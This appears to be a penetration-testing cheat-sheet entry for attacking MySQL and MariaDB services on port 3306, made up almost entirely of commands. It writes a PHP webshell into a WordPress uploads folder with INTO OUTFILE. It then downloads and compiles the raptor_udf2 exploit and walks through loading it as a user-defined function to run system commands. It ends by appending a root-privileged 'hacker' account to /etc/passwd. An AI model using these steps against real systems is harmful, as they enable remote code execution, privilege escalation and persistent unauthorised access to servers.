tcp/3306 mysql

• write webshell to filesystem

> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";

MariaDB

• MariaDB 10.2, https://github.com/Al1ex/CVE-2021-27928
• Prepare the exploit: https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c

> wget https://raw.githubusercontent.com/1N3/PrivEsc/master/mysql/raptor_udf2.c
> gcc -g -c raptor_udf2.c
> gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
> mysql -u root -p

• Exploit steps

mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));

# Look for the value of plugin_dir and use the plugin_dir as the dump file location
mysql> show variables like '%plugin%';

mysql> select * from foo into dumpfile "<select-a-path-from-above>/raptor_udf2.so";
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;

# Sometime this may say the file is too short, try to compile the .so in a different folde

# create a user hacker:pass123
mysql> select do_system('echo \'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash\' >> /etc/passwd');